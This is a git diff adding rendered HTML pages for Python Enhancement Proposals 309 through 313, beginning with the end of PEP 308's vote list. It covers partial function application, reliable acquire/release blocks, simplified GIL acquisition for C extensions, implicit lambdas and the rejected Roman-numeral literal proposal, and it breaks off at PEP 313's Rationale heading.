+1:  Q reject choice: c1->a; c2->b; ...; z
+3:  Q accept [if C then x else y]
+3:  Q reject no other choice has x as the first element
+1:  Q accept (x,y) ? C
+3:  Q accept x if C else y (The "else y" being optional)
+1:  Q accept (C ? x , y)
+1:  Q accept  any outcome (i.e form or plain rejection) from a usability study
+1:  Q reject (x if C else y)
+1:  Q accept  (x if C else y)
+2:  Q reject   NONE
+3:  Q reject   NONE
+3:  Q accept  (C ? x else y)
+3:  Q accept  x when C else y
+2:  Q accept  (x if C else y)
+2:  Q accept cond(C1, x1, C2, x2, C3, x3,...)
+1:  Q accept  (if C1: x elif C2: y else: z)
+1:  Q reject cond(C, :x, :y)
+3:  Q accept  (C and [x] or [y])[0]
+2:  Q reject
+3:  Q reject
+3:  Q reject all else
+1:  Q reject no-change
+3:  Q reject deliberately omitted as I have no interest in any other proposal
+2:  Q reject (C then x else Y)
+1:  Q accept       if C: x else: y
+1:  Q reject (if C then x else y)
+3:  Q reject C?(x, y)
+
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0308.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0309/index.html b/pep-0309/index.html
new file mode 100644
index 00000000000..b1f9d53de54
--- /dev/null
+++ b/pep-0309/index.html
@@ -0,0 +1,386 @@

PEP 309 – Partial Function Application | peps.python.org
+
+


+ + +
+
+
+

PEP 309 – Partial Function Application

+
+
Author:
+
Peter Harris <scav at blueyonder.co.uk>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
08-Feb-2003
+
Python-Version:
+
2.5
+
Post-History:
+
10-Feb-2003, 27-Feb-2003, 22-Feb-2004, 28-Apr-2006
+
+
+
+
Table of Contents +
+
+

Note

+

Following the acceptance of this PEP, further discussion on python-dev and +comp.lang.python revealed a desire for several tools that operated on +function objects, but were not related to functional programming. Rather +than create a new module for these tools, it was agreed [1] that the +“functional” module be renamed to “functools” to reflect its newly-widened +focus.

+

References in this PEP to a “functional” module have been left in for +historical reasons.

+
+
+

Abstract

+

This proposal is for a function or callable class that allows a new +callable to be constructed from a callable and a partial argument list +(including positional and keyword arguments).

+

I propose a standard library module called “functional”, to hold +useful higher-order functions, including the implementation of +partial().

+

An implementation has been submitted to SourceForge [2].

+
+
+

Acceptance

+

Patch #941881 was accepted and applied in 2005 for Py2.5. It is +essentially as outlined here, a partial() type constructor binding +leftmost positional arguments and any keywords. The partial object has +three read-only attributes func, args, and keywords. Calls to the partial +object can specify keywords that override those in the object itself.

+
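As accepted (and later moved to functools, per the note above), the behaviour looks like this:

from functools import partial    # proposed here under the name 'functional'

basetwo = partial(int, base=2)
basetwo('10010')                  # 18
basetwo.func, basetwo.args, basetwo.keywords   # int, (), {'base': 2}
basetwo('ff', base=16)            # 255: call keywords override stored ones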

There is a separate and continuing discussion of whether to modify the +partial implementation with a __get__ method to more closely emulate +the behavior of an equivalent function.

+
+
+

Motivation

+

In functional programming, function currying is a way of implementing +multi-argument functions in terms of single-argument functions. A +function with N arguments is really a function with 1 argument that +returns another function taking (N-1) arguments. Function application +in languages like Haskell and ML works such that a function call:

+
f x y z
+
+
+

actually means:

+
(((f x) y) z)
+
+
+
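In Python terms, the same shape can be written with nested single-argument functions (a sketch, not part of this proposal):

def f(x):
    return lambda y: lambda z: x + y + z

f(1)(2)(3)    # 6: each call binds exactly one argument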

This would be only an obscure theoretical issue except that in actual +programming it turns out to be very useful. Expressing a function in +terms of partial application of arguments to another function can be +both elegant and powerful, and in functional languages it is heavily +used.

+

In some functional languages, (e.g. Miranda) you can use an expression +such as (+1) to mean the equivalent of Python’s +(lambda x: x + 1).

+

In general, languages like that are strongly typed, so the compiler +always knows the number of arguments expected and can do the right +thing when presented with a functor and less arguments than expected.

+

Python does not implement multi-argument functions by currying, so if +you want a function with partially-applied arguments you would +probably use a lambda as above, or define a named function for each +instance.

+

However, lambda syntax is not to everyone’s taste, to say the least. Furthermore, Python’s flexible parameter passing using both positional and keyword arguments presents an opportunity to generalise the idea of partial application and do things that lambda cannot.

+
+
+

Example Implementation

+

Here is one way to create a callable with partially-applied arguments in Python. The implementation below is based on improvements provided by Scott David Daniels:

+
class partial(object):
+
+    def __init__(*args, **kw):
+        # 'self' is taken positionally so that the wrapped callable can
+        # itself accept keyword arguments named 'self' or 'fn'.
+        self = args[0]
+        self.fn, self.args, self.kw = (args[1], args[2:], kw)
+
+    def __call__(self, *args, **kw):
+        if kw and self.kw:
+            d = self.kw.copy()
+            d.update(kw)
+        else:
+            d = kw or self.kw
+        return self.fn(*(self.args + args), **d)
+
+
+

(A recipe similar to this has been in the Python Cookbook for some +time [3].)

+

Note that when the object is called as though it were a function, +positional arguments are appended to those provided to the +constructor, and keyword arguments override and augment those provided +to the constructor.

+

Positional arguments, keyword arguments or both can be supplied both when creating the object and when calling it.

+
+
+

Examples of Use

+

So partial(operator.add, 1) is a bit like (lambda x: 1 + x). +Not an example where you see the benefits, of course.

+

Note too, that you could wrap a class in the same way, since classes +themselves are callable factories for objects. So in some cases, +rather than defining a subclass, you can specialise classes by partial +application of the arguments to the constructor.

+

For example, partial(Tkinter.Label, fg='blue') makes Tkinter +Labels that have a blue foreground by default.

+

Here’s a simple example that uses partial application to construct +callbacks for Tkinter widgets on the fly:

+
from Tkinter import Tk, Canvas, Button
+import sys
+from functional import partial
+
+win = Tk()
+c = Canvas(win,width=200,height=50)
+c.pack()
+
+for colour in sys.argv[1:]:
+    b = Button(win, text=colour,
+               command=partial(c.config, bg=colour))
+    b.pack(side='left')
+
+win.mainloop()
+
+
+
+
+

Abandoned Syntax Proposal

+

I originally suggested the syntax fn@(*args, **kw), meaning the +same as partial(fn, *args, **kw).

+

The @ sign is used in some assembly languages to imply register +indirection, and the use here is also a kind of indirection. +f@(x) is not f(x), but a thing that becomes f(x) when you +call it.

+

It was not well-received, so I have withdrawn this part of the +proposal. In any case, @ has been taken for the new decorator syntax.

+
+
+

Feedback from comp.lang.python and python-dev

+

Among the opinions voiced were the following (which I summarise):

+
    +
  • Lambda is good enough.
  • +
  • The @ syntax is ugly (unanimous).
  • +
  • It’s really a curry rather than a closure. There is an almost +identical implementation of a curry class on ActiveState’s Python +Cookbook.
  • +
  • A curry class would indeed be a useful addition to the standard +library.
  • +
  • It isn’t function currying, but partial application. Hence the +name is now proposed to be partial().
  • +
  • It maybe isn’t useful enough to be in the built-ins.
  • +
  • The idea of a module called functional was well received, and +there are other things that belong there (for example function +composition).
  • +
  • For completeness, another object that appends partial arguments +after those supplied in the function call (maybe called +rightcurry) has been suggested.
  • +
+

I agree that lambda is usually good enough, just not always. And I +want the possibility of useful introspection and subclassing.

+

I disagree that @ is particularly ugly, but it may be that I’m just +weird. We have dictionary, list and tuple literals neatly +differentiated by special punctuation – a way of directly expressing +partially-applied function literals is not such a stretch. However, +not one single person has said they like it, so as far as I’m +concerned it’s a dead parrot.

+

I concur with calling the class partial rather than curry or closure, +so I have amended the proposal in this PEP accordingly. But not +throughout: some incorrect references to ‘curry’ have been left in +since that’s where the discussion was at the time.

+

Partially applying arguments from the right, or inserting arguments at +arbitrary positions creates its own problems, but pending discovery of +a good implementation and non-confusing semantics, I don’t think it +should be ruled out.

+
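
For illustration only, here is one hypothetical shape such a +rightcurry object could take: a variant of the partial class above +that appends its stored arguments after the call-time ones. It is +a sketch, not part of the proposal:

+
import operator
+
+class rightcurry(object):
+
+    def __init__(*args, **kw):
+        self = args[0]
+        self.fn, self.args, self.kw = (args[1], args[2:], kw)
+
+    def __call__(self, *args, **kw):
+        d = self.kw.copy()
+        d.update(kw)
+        # call-time positional arguments come first
+        return self.fn(*(args + self.args), **d)
+
+assert rightcurry(operator.sub, 1)(10) == 9   # i.e. sub(10, 1)
+
+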

Carl Banks posted an implementation as a real functional closure:

+
def curry(fn, *cargs, **ckwargs):
+    def call_fn(*fargs, **fkwargs):
+        d = ckwargs.copy()
+        d.update(fkwargs)
+        return fn(*(cargs + fargs), **d)
+    return call_fn
+
+
+

which he assures me is more efficient.

+

I also coded the class in Pyrex, to estimate how the performance +might be improved by coding it in C:

+
cdef class curry:
+
+    cdef object fn, args, kw
+
+    def __init__(self, fn, *args, **kw):
+        self.fn = fn
+        self.args = args
+        self.kw = kw
+
+    def __call__(self, *args, **kw):
+        if self.kw:        # from Python Cookbook version
+            d = self.kw.copy()
+            d.update(kw)
+        else:
+            d = kw
+        return self.fn(*(self.args + args), **d)
+
+
+

The performance gain in Pyrex is less than 100% over the nested +function implementation, since to be fully general it has to operate +by Python API calls. For the same reason, a C implementation will be +unlikely to be much faster, so the case for a built-in coded in C is +not very strong.

+
+
+

Summary

+

I prefer that some means to partially apply functions and other +callables should be present in the standard library.

+

A standard library module functional should contain an +implementation of partial, and any other higher-order functions +the community wants. Other functions that might belong there fall +outside the scope of this PEP, though.

+

Patches for the implementation, documentation and unit tests (SF +patches 931005, 931007, and 931010 respectively) have been +submitted but not yet checked in.

+

A C implementation by Hye-Shik Chang has also been submitted, although +it is not expected to be included until after the Python +implementation has proven itself useful enough to be worth optimising.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0309.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0310/index.html new file mode 100644 index 00000000000..6a86833a0d9 --- /dev/null +++ b/pep-0310/index.html @@ -0,0 +1,362 @@ + + + + + + + + PEP 310 – Reliable Acquisition/Release Pairs | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 310 – Reliable Acquisition/Release Pairs

+
+
Author:
+
Michael Hudson <mwh at python.net>, +Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Dec-2002
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

It would be nice to have a less typing-intensive way of writing:

+
the_lock.acquire()
+try:
+    ....
+finally:
+    the_lock.release()
+
+
+

This PEP proposes a piece of syntax (a ‘with’ block) and a +“small-i” interface that generalizes the above.

+
+
+

Pronouncement

+

This PEP is rejected in favor of PEP 343.

+
+
+

Rationale

+

One of the advantages of Python’s exception handling philosophy is +that it makes it harder to do the “wrong” thing (e.g. failing to +check the return value of some system call). Currently, this does +not apply to resource cleanup. The current syntax for acquisition +and release of a resource (for example, a lock) is:

+
the_lock.acquire()
+try:
+    ....
+finally:
+    the_lock.release()
+
+
+

This syntax separates the acquisition and release by a (possibly +large) block of code, which makes it difficult to confirm “at a +glance” that the code manages the resource correctly. Another +common error is to code the “acquire” call within the try block, +which incorrectly releases the lock if the acquire fails.

+
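
To make that second error concrete, here is the broken form, a +sketch using threading.Lock as the resource:

+
import threading
+
+the_lock = threading.Lock()
+
+try:
+    the_lock.acquire()    # wrong place: if acquire() raised, the
+    print('lock held')    # finally clause would still release a
+finally:                  # lock this code never took
+    the_lock.release()
+
+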
+
+

Basic Syntax and Semantics

+

The syntax of a ‘with’ statement is as follows:

+
'with' [ var '=' ] expr ':'
+    suite
+
+
+

This statement is defined as being equivalent to the following +sequence of statements:

+
var = expr
+
+if hasattr(var, "__enter__"):
+    var.__enter__()
+
+try:
+    suite
+
+finally:
+    var.__exit__()
+
+
+

(Unlike that of __enter__, the presence of an __exit__ method is +deliberately not checked in advance, so that using an inappropriate +object in a with: statement gives an error.)

+

If the variable is omitted, an unnamed object is allocated on the +stack. In that case, the suite has no access to the unnamed object.

+
+
+

Possible Extensions

+

A number of potential extensions to the basic syntax have been +discussed on the Python Developers list. None of these extensions +are included in the solution proposed by this PEP. In many cases, +the arguments are nearly equally strong in both directions. In +such cases, the PEP has always chosen simplicity, simply because +where extra power is needed, the existing try block is available.

+
+

Multiple expressions

+

One proposal was for allowing multiple expressions within one +‘with’ statement. The __enter__ methods would be called left to +right, and the __exit__ methods right to left. The advantage of +doing so is that where more than one resource is being managed, +nested ‘with’ statements will result in code drifting towards the +right margin. The solution to this problem is the same as for any +other deep nesting - factor out some of the code into a separate +function. Furthermore, the question of what happens if one of the +__exit__ methods raises an exception (should the other __exit__ +methods be called?) needs to be addressed.

+
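
For illustration, the drift and the suggested factoring look like +this (a_lock, b_lock and work() are stand-ins, and the variable-free +form of the proposed statement is used):

+
# nested statements drift towards the right margin...
+with a_lock:
+    with b_lock:
+        work()
+
+# ...so factor the inner resource management into a function
+def locked_work():
+    with b_lock:
+        work()
+
+with a_lock:
+    locked_work()
+
+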
+
+

Exception handling

+

An extension to the protocol to include an optional __except__ +handler, which is called when an exception is raised, and which +can handle or re-raise the exception, has been suggested. It is +not at all clear that the semantics of this extension can be made +precise and understandable. For example, should the equivalent +code be try ... except ... else if an exception handler is +defined, and try ... finally if not? How can this be determined +at compile time, in general? The alternative is to define the +code as expanding to a try ... except inside a try ... finally. +But this may not do the right thing in real life.

+

The only use case identified for exception handling is with +transactional processing (commit on a clean finish, and rollback +on an exception). This is probably just as easy to handle with a +conventional try ... except ... else block, and so the PEP does +not include any support for exception handlers.

+
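
That conventional block looks like this (FakeDB is a stand-in +defining the three obvious methods):

+
class FakeDB(object):
+    def execute(self, op): self.last = op
+    def rollback(self):    self.state = 'rolled back'
+    def commit(self):      self.state = 'committed'
+
+db = FakeDB()
+
+try:
+    db.execute('UPDATE ...')    # commit on a clean finish,
+except Exception:               # roll back on an exception
+    db.rollback()
+    raise
+else:
+    db.commit()
+
+assert db.state == 'committed'
+
+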
+
+
+

Implementation Notes

+

There is a potential race condition in the code specified as +equivalent to the with statement. For example, if a +KeyboardInterrupt exception is raised between the completion of +the __enter__ method call and the start of the try block, the +__exit__ method will not be called. This can lead to resource +leaks, or to deadlocks. [XXX Guido has stated that he cares about +this sort of race condition, and intends to write some C magic to +handle them. The implementation of the ‘with’ statement should +copy this.]

+
+
+

Open Issues

+

Should existing classes (for example, file-like objects and locks) +gain appropriate __enter__ and __exit__ methods? The obvious +reason in favour is convenience (no adapter needed). The argument +against is that if built-in files have this but (say) StringIO +does not, then code that uses “with” on a file object can’t be +reused with a StringIO object. So __exit__ = close becomes a part +of the “file-like object” protocol, which user-defined classes may +need to support.

+

The __enter__ hook may be unnecessary - for many use cases, an +adapter class is needed and in that case, the work done by the +__enter__ hook can just as easily be done in the __init__ hook.

+
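
A sketch of such an adapter, with the acquisition done in __init__ +and only the proposed __exit__ hook supplied (the class name is +illustrative):

+
class opened(object):
+
+    def __init__(self, filename):
+        self.file = open(filename)   # acquire in the constructor
+
+    def __exit__(self):
+        self.file.close()            # release via the proposed hook
+
+# intended use under this PEP: with f = opened('readme.txt'): ...
+
+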

If a way of controlling object lifetimes explicitly was available, +the function of the __exit__ hook could be taken over by the +existing __del__ hook. An email exchange [1] with a proponent of +this approach left one of the authors even more convinced that +it isn’t the right idea…

+

It has been suggested [2] that the “__exit__” method be called +“close”, or that a “close” method should be considered if no +__exit__ method is found, to increase the “out-of-the-box utility” +of the “with …” construct.

+

There are some similarities in concept between ‘with …’ blocks +and generators, which have led to proposals that for loops could +implement the with block functionality [3]. While neat on some +levels, we think that for loops should stick to being loops.

+
+
+

Alternative Ideas

+

IEXEC: Holger Krekel – generalised approach with XML-like syntax +(no URL found…).

+

Holger has much more far-reaching ideas about “execution monitors” +that are informed about details of control flow in the monitored +block. While interesting, these ideas could change the language +in deep and subtle ways and as such belong to a different PEP.

+

Any Smalltalk/Ruby anonymous block style extension obviously +subsumes this one.

+

PEP 319 is in the same area, but did not win support when aired on +python-dev.

+
+
+

Backwards Compatibility

+

This PEP proposes a new keyword, so the __future__ game will need +to be played.

+
+
+

Cost of Adoption

+

Those who claim the language is getting larger and more +complicated have something else to complain about. It’s something +else to teach.

+

For the proposal to be useful, many file-like and lock-like +classes in the standard library and other code will have to have

+
__exit__ = close
+
+
+

or similar added.

+
+
+

Cost of Non-Adoption

+

Writing correct code continues to be more effort than writing +incorrect code.

+
+
+

References

+

There are various python-list and python-dev discussions that +could be mentioned here.

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0310.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0311/index.html new file mode 100644 index 00000000000..1e5862db8fb --- /dev/null +++ b/pep-0311/index.html @@ -0,0 +1,347 @@ + + + + + + + + PEP 311 – Simplified Global Interpreter Lock Acquisition for Extensions | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 311 – Simplified Global Interpreter Lock Acquisition for Extensions

+
+
Author:
+
Mark Hammond <mhammond at skippinet.com.au>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Feb-2003
+
Python-Version:
+
2.3
+
Post-History:
+
05-Feb-2003, 14-Feb-2003, 19-Apr-2003
+
+
+
+
+
+

Abstract

+

This PEP proposes a simplified API for access to the Global +Interpreter Lock (GIL) for Python extension modules. +Specifically, it provides a solution for authors of complex +multi-threaded extensions, where the current state of Python +(i.e., the state of the GIL) is unknown.

+

This PEP proposes a new API, for platforms built with threading +support, to manage the Python thread state. An implementation +strategy is proposed, along with an initial, platform independent +implementation.

+
+
+

Rationale

+

The current Python interpreter state API is suitable for simple, +single-threaded extensions, but quickly becomes incredibly complex +for non-trivial, multi-threaded extensions.

+

Currently Python provides two mechanisms for dealing with the GIL:

+
    +
• Py_BEGIN_ALLOW_THREADS and Py_END_ALLOW_THREADS macros. +These macros are provided primarily to allow a simple Python +extension that already owns the GIL to temporarily release it +while making an “external” (i.e., non-Python), generally +expensive, call. Any existing Python threads that are blocked +waiting for the GIL are then free to run. While this is fine +for extensions making calls from Python into the outside world, +it is no help for extensions that need to make calls into Python +when the thread state is unknown.
  • +
  • PyThreadState and PyInterpreterState APIs. +These API functions allow an extension/embedded application to +acquire the GIL, but suffer from a serious boot-strapping +problem - they require you to know the state of the Python +interpreter and of the GIL before they can be used. One +particular problem is for extension authors that need to deal +with threads never before seen by Python, but need to call +Python from this thread. It is very difficult, delicate and +error prone to author an extension where these “new” threads +always know the exact state of the GIL, and therefore can +reliably interact with this API.
  • +
+

For these reasons, the question of how such extensions should +interact with Python is quickly becoming a FAQ. The main impetus +for this PEP, a thread on python-dev [1], immediately identified +the following projects with this exact issue:

+
    +
  • The win32all extensions
  • +
  • Boost
  • +
  • ctypes
  • +
  • Python-GTK bindings
  • +
  • Uno
  • +
  • PyObjC
  • +
  • Mac toolbox
  • +
  • PyXPCOM
  • +
+

Currently, there is no reasonable, portable solution to this +problem, forcing each extension author to implement their own +hand-rolled version. Further, the problem is complex, meaning +many implementations are likely to be incorrect, leading to a +variety of problems that will often manifest simply as “Python has +hung”.

+

While the biggest problem in the existing thread-state API is the +lack of the ability to query the current state of the lock, it is +felt that a more complete, simplified solution should be offered +to extension authors. Such a solution should encourage authors to +provide error-free, complex extension modules that take full +advantage of Python’s threading mechanisms.

+
+
+

Limitations and Exclusions

+

This proposal identifies a solution for extension authors with +complex multi-threaded requirements, but that only require a +single “PyInterpreterState”. There is no attempt to cater for +extensions that require multiple interpreter states. At the time +of writing, no extension has been identified that requires +multiple PyInterpreterStates, and indeed it is not clear if that +facility works correctly in Python itself.

+

This API will not perform automatic initialization of Python, or +initialize Python for multi-threaded operation. Extension authors +must continue to call Py_Initialize(), and for multi-threaded +applications, PyEval_InitThreads(). The reason for this is that +the first thread to call PyEval_InitThreads() is nominated as the +“main thread” by Python, and so forcing the extension author to +specify the main thread (by requiring them to make this first call) +removes ambiguity. As Py_Initialize() must be called before +PyEval_InitThreads(), and as both of these functions currently +support being called multiple times, the burden this places on +extension authors is considered reasonable.

+

It is intended that this API be all that is necessary to acquire +the Python GIL. Apart from the existing, standard +Py_BEGIN_ALLOW_THREADS and Py_END_ALLOW_THREADS macros, it is +assumed that no additional thread state API functions will be used +by the extension. Extensions with such complicated requirements +are free to continue to use the existing thread state API.

+
+
+

Proposal

+

This proposal recommends a new API be added to Python to simplify +the management of the GIL. This API will be available on all +platforms built with WITH_THREAD defined.

+

The intent is that assuming Python has correctly been initialized, +an extension author be able to use a small, well-defined “prologue +dance”, at any time and on any thread, which will ensure Python +is ready to be used on that thread. After the extension has +finished with Python, it must also perform an “epilogue dance” to +release any resources previously acquired. Ideally, these dances +can be expressed in a single line.

+

Specifically, the following new APIs are proposed:

+
/* Ensure that the current thread is ready to call the Python
+   C API, regardless of the current state of Python, or of its
+   thread lock.  This may be called as many times as desired
+   by a thread so long as each call is matched with a call to
+   PyGILState_Release().  In general, other thread-state APIs may
+   be used between _Ensure() and _Release() calls, so long as the
+   thread-state is restored to its previous state before the Release().
+   For example, normal use of the Py_BEGIN_ALLOW_THREADS/
+   Py_END_ALLOW_THREADS macros are acceptable.
+
+   The return value is an opaque "handle" to the thread state when
+   PyGILState_Ensure() was called, and must be passed to
+   PyGILState_Release() to ensure Python is left in the same state. Even
+   though recursive calls are allowed, these handles can *not* be
+   shared - each unique call to PyGILState_Ensure must save the handle
+   for its call to PyGILState_Release.
+
+   When the function returns, the current thread will hold the GIL.
+
+   Failure is a fatal error.
+*/
+PyAPI_FUNC(PyGILState_STATE) PyGILState_Ensure(void);
+
+/* Release any resources previously acquired.  After this call, Python's
+   state will be the same as it was prior to the corresponding
+   PyGILState_Ensure call (but generally this state will be unknown to
+   the caller, hence the use of the GILState API.)
+
+   Every call to PyGILState_Ensure must be matched by a call to
+   PyGILState_Release on the same thread.
+*/
+PyAPI_FUNC(void) PyGILState_Release(PyGILState_STATE);
+
+
+

Common usage will be:

+
void SomeCFunction(void)
+{
+    /* ensure we hold the lock */
+    PyGILState_STATE state = PyGILState_Ensure();
+    /* Use the Python API */
+    ...
+    /* Restore the state of Python */
+    PyGILState_Release(state);
+}
+
+
+
+
+

Design and Implementation

+

The general operation of PyGILState_Ensure() will be:

+
    +
  • assert Python is initialized.
  • +
  • Get a PyThreadState for the current thread, creating and saving +if necessary.
  • +
  • remember the current state of the lock (owned/not owned)
  • +
  • If the current state does not own the GIL, acquire it.
  • +
  • Increment a counter for how many calls to PyGILState_Ensure have been +made on the current thread.
  • +
  • return
  • +
+

The general operation of PyGILState_Release() will be:

+
    +
  • assert our thread currently holds the lock.
  • +
  • If old state indicates lock was previously unlocked, release GIL.
  • +
  • Decrement the PyGILState_Ensure counter for the thread.
  • +
  • If counter == 0:
      +
    • release and delete the PyThreadState.
    • +
    • forget the ThreadState as being owned by the thread.
    • +
    +
  • +
  • return
  • +
+

It is assumed that it is an error if two discrete PyThreadStates +are used for a single thread. Comments in pystate.h (“State +unique per thread”) support this view, although it is never +directly stated. Thus, this will require some implementation of +Thread Local Storage. Fortunately, a platform independent +implementation of Thread Local Storage already exists in the +Python source tree, in the SGI threading port. This code will be +integrated into the platform independent Python core, but in such +a way that platforms can provide a more optimal implementation if +desired.

+
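
As a toy model only, that bookkeeping can be sketched in Python with +thread-local storage; the real implementation is C code manipulating +the PyThreadState and the GIL:

+
import threading
+
+_tls = threading.local()
+
+def ensure():
+    state = getattr(_tls, 'depth', 0)   # the opaque handle
+    _tls.depth = state + 1
+    # (a state of 0 means the GIL would be acquired here)
+    return state
+
+def release(state):
+    _tls.depth -= 1
+    # (a state of 0 means the GIL would be released here)
+    if _tls.depth == 0:
+        del _tls.depth                  # forget the thread state
+
+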
+
+

Implementation

+

An implementation of this proposal can be found at +https://bugs.python.org/issue684256

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0311.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0312/index.html new file mode 100644 index 00000000000..96cda61c787 --- /dev/null +++ b/pep-0312/index.html @@ -0,0 +1,309 @@ + + + + + + + + PEP 312 – Simple Implicit Lambda | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 312 – Simple Implicit Lambda

+
+
Author:
+
Roman Suzi <rnd at onego.ru>, Alex Martelli <aleaxit at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
11-Feb-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP proposes to make the argumentless lambda keyword optional in +some cases where it is not grammatically ambiguous.

+
+
+

Deferral

+

The BDFL hates the unary colon syntax. This PEP needs to go back +to the drawing board and find a more Pythonic syntax (perhaps an +alternative unary operator). See python-dev discussion on +17 June 2005 [1].

+

Also, it is probably a good idea to eliminate the alternative +propositions which have no chance at all. The examples section +is good and highlights the readability improvements. It would +carry more weight with additional examples and with real-world +referents (instead of the abstracted dummy calls to :A and :B).

+
+
+

Motivation

+

Lambdas are useful for defining anonymous functions, e.g. for use +as callbacks or (pseudo)-lazy evaluation schemes. Often, lambdas +are not used when they would be appropriate, just because the +keyword “lambda” makes code look complex. Omitting lambda in some +special cases is possible, with small and backwards compatible +changes to the grammar, and provides a cheap cure against such +“lambdaphobia”.

+
+
+

Rationale

+

Sometimes people do not use lambdas because they fear to introduce +a term with a theory behind it. This proposal makes introducing +argumentless lambdas easier, by omitting the “lambda” keyword +itself. Implementation can be done by simply changing the grammar so it +lets the “lambda” keyword be implied in a few well-known cases. +In particular, adding surrounding brackets lets you specify a +nullary lambda anywhere.

+
+
+

Syntax

+

An argumentless “lambda” keyword can be omitted in the following +cases:

+
    +
  • immediately after “=” in named parameter assignment or default +value assignment;
  • +
  • immediately after “(” in any expression;
  • +
  • immediately after a “,” in a function argument list;
  • +
  • immediately after a “:” in a dictionary literal; (not +implemented)
  • +
  • in an assignment statement; (not implemented)
  • +
+
+
+

Examples of Use

+
    +
  1. Inline if:
    def ifelse(cond, true_part, false_part):
    +    if cond:
    +        return true_part()
    +    else:
    +        return false_part()
    +
    +# old syntax:
    +print ifelse(a < b, lambda:A, lambda:B)
    +
    +# new syntax:
    +print ifelse(a < b, :A, :B)
    +
    +# parts A and B may require extensive processing, as in:
    +print ifelse(a < b, :ext_proc1(A), :ext_proc2(B))
    +
    +
    +
  2. +
  3. Locking:
    def with(alock, acallable):
    +    alock.acquire()
    +    try:
    +        acallable()
    +    finally:
    +        alock.release()
    +
    +with(mylock, :x(y(), 23, z(), 'foo'))
    +
    +
    +
  4. +
+
+
+

Implementation

+

Implementation requires some tweaking of the Grammar/Grammar file +in the Python sources, and some adjustment of +Modules/parsermodule.c to make syntactic and pragmatic changes.

+

(Some grammar/parser guru is needed to make a full +implementation.)

+

Here are the changes needed to Grammar to allow implicit lambda:

+
varargslist: (fpdef ['=' imptest] ',')* ('*' NAME [',' '**'
+NAME] | '**' NAME) | fpdef ['=' imptest] (',' fpdef ['='
+imptest])* [',']
+
+imptest: test | implambdef
+
+atom: '(' [imptestlist] ')' | '[' [listmaker] ']' |
+'{' [dictmaker] '}' | '`' testlist1 '`' | NAME | NUMBER | STRING+
+
+implambdef: ':' test
+
+imptestlist: imptest (',' imptest)* [',']
+
+argument: [test '='] imptest
+
+
+

Three new non-terminals are needed: imptest for the place where +implicit lambda may occur, implambdef for the implicit lambda +definition itself, imptestlist for a place where imptest’s may +occur.

+

This implementation is not complete. First, some files in the +Parser module need to be updated. Second, some additional places +aren’t implemented; see the Syntax section above.

+
+
+

Discussion

+

This feature is not a high-visibility one (the only novel part is +the absence of lambda). The feature is intended to make null-ary +lambdas more appealing syntactically, to provide lazy evaluation +of expressions in some simple cases. This proposal is not targeted +at more advanced cases (demanding arguments for the lambda).

+

There is an alternative proposition for implicit lambda: implicit +lambda with unused arguments. In this case the function defined by +such lambda can accept any parameters, i.e. be equivalent to: +lambda *args: expr. This form would be more powerful. Grep in the +standard library revealed that such lambdas are indeed in use.

+

One more extension can provide a way to have a list of parameters +passed to a function defined by implicit lambda. However, such +parameters need some special name to be accessed and are unlikely +to be included in the language. Possible local names for such +parameters are: _, __args__, __. For example:

+
reduce(:_[0] + _[1], [1,2,3], 0)
+reduce(:__[0] + __[1], [1,2,3], 0)
+reduce(:__args__[0] + __args__[1], [1,2,3], 0)
+
+
+

These forms do not look very nice, and in the PEP author’s opinion +do not justify the removal of the lambda keyword in such cases.

+
+
+

Credits

+

The idea of dropping lambda was first coined by Paul Rubin at 08 +Feb 2003 16:39:30 -0800 in comp.lang.python while discussing the +thread “For review: PEP 308 - If-then-else expression” [2].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0312.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0313/index.html new file mode 100644 index 00000000000..4105c5c02b8 --- /dev/null +++ b/pep-0313/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 313 – Adding Roman Numeral Literals to Python | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 313 – Adding Roman Numeral Literals to Python

+
+
Author:
+
Mike Meyer <mwm at mired.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Apr-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP (also known as PEP CCCXIII) proposes adding Roman +numerals as a literal type. It also proposes the new built-in +function “roman”, which converts an object to an integer, then +converts the integer to a string that is the Roman numeral literal +equivalent to the integer.

+
+
+

BDFL Pronouncement

+

This PEP is rejected. While the majority of Python users deemed this +to be a nice-to-have feature, the community was unable to reach a +consensus on whether nine should be represented as IX, the modern +form, or VIIII, the classic form. Likewise, no agreement was +reached on whether MXM or MCMXC would be considered a well-formed +representation of 1990. A vocal minority of users has also requested +support for lower-cased numerals for use in (i) powerpoint slides, +(ii) academic work, and (iii) Perl documentation.

+
+
+

Rationale

+

